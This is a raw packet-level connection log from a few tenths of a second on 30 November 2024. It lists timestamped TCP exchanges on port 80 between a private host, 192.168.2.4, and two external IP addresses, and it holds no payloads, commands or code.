Nov 30, 2024 04:06:53.660909891 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.660936117 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.664222002 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.664256096 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.664268017 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.667577982 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.667628050 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.667681932 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.670968056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.671008110 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.671075106 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.674324989 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.674367905 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.674439907 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.677695990 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.677757978 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.677793980 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.681090117 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.681134939 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.681204081 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.684470892 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.684516907 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.684541941 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.687829018 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.687876940 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.687947989 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.689285040 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.689333916 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.689395905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.689466000 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.689883947 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.689939976 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.689966917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.690011978 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.690685034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.690737009 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.690804005 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.690850973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.691152096 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.691200972 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.691282034 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.691802025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.691847086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.691914082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.691963911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.692852974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.692907095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.692972898 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.693034887 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.693929911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.693979979 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.694062948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.694112062 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.694515944 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.694560051 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.694626093 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.695029974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.695076942 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.695137978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.695187092 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.696141005 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.696257114 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.696306944 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.697186947 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.697237015 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.697318077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.697365999 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.697884083 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.697935104 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.697997093 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.698278904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.698328972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.698359966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.698409081 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.699372053 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.699419975 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.699493885 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.699543953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.700479984 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.700525045 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.700586081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.700634003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.701277971 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.701319933 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.701399088 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.701539993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.701632977 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.701637030 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.701685905 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.702625036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.702670097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.702730894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.702779055 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.703715086 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.703764915 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.703811884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.703877926 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.704632998 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.704678059 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.704695940 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.704790115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.704838991 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.704886913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.705022097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.705900908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.705951929 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.706017971 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.706064939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.706963062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.707010031 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.707099915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.707139015 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.708003998 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.708050013 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.708070993 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.708082914 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.708126068 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.708198071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.708302021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.709142923 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.709203959 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.709264040 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.709316969 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.710238934 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.710288048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.710369110 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.710417032 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.711340904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.711401939 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.711411953 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.711426020 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.711450100 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.711452007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.711519003 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.712420940 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.712462902 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.712526083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.712574959 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.713510036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.713521004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.713562965 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.714595079 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.714701891 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.714709997 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.714762926 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.714766026 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.714777946 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.714848995 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.715694904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.715744972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.715775967 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.715818882 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.716756105 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.716804028 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.716864109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.716909885 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.717854023 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.717921972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.717955112 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.718096018 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.718096972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.718136072 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.718198061 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.718936920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.718983889 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.719033003 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.719079971 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.720048904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.720093966 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.720096111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.720145941 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.721118927 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.721164942 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.721239090 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.721286058 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.721463919 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.721507072 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.721570969 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.722196102 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.722230911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.722243071 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.722280979 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.723290920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.723467112 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.724366903 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.724493980 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.724817991 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.724849939 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.724955082 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.725109100 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.725462914 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.725606918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.725629091 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.725687981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.726526976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.726572990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.726644039 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.726686954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.727629900 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.727735043 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.728215933 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.728341103 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.728739023 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.728846073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.729801893 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.729937077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.730910063 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.731004953 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.731590033 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.731719971 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.731986046 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.732106924 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.733059883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.733184099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.734179020 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.734318972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.734941959 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.735050917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.735254049 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.735275030 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.735279083 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.735352993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.735444069 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.735516071 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.735583067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.735630989 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.736325979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.736448050 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.736742973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.737409115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.737452984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.737535954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.737577915 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.738327026 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.738372087 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.738403082 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.738487959 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.738535881 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.738589048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.738627911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.739578009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.739697933 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.740698099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.740807056 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.741740942 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.741872072 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.742844105 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.742953062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.743118048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.743179083 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.743936062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.744029999 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.744064093 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.744303942 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.745022058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.745070934 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.745120049 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.745166063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.746073961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.746129036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.784848928 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.799845934 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.799949884 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.799998045 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.801352024 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.801459074 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.801707983 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.804377079 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.804470062 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.804518938 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.807410955 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.807531118 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.807578087 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.810291052 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.810369015 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.810415030 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.825419903 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.825649023 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.825697899 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.826143026 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.826312065 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.826359034 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.828608990 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.828807116 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.828859091 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.831078053 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.831167936 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.831214905 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.833559990 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.833697081 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.833889961 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.836025953 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.836148024 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.836199999 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.838396072 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.838505030 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.838583946 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.840784073 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.840893030 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.840944052 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.843110085 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.843208075 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.843255043 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.850259066 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.850379944 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.850398064 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.850409985 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.850421906 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.850428104 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.850435972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.850447893 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.850543976 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.856244087 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.856303930 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.856314898 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.856347084 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.856400013 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.856467009 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.862822056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.862889051 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.862900972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.862942934 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.863029957 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.863040924 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.863051891 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.863157988 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.863197088 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.863210917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.863250017 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.863746881 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.863843918 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.863897085 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.865108013 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.865220070 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.865264893 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.866492987 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.866612911 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.866657019 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.867861032 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.867990017 CET	80	49894	185.215.113.16	192.168.2.4
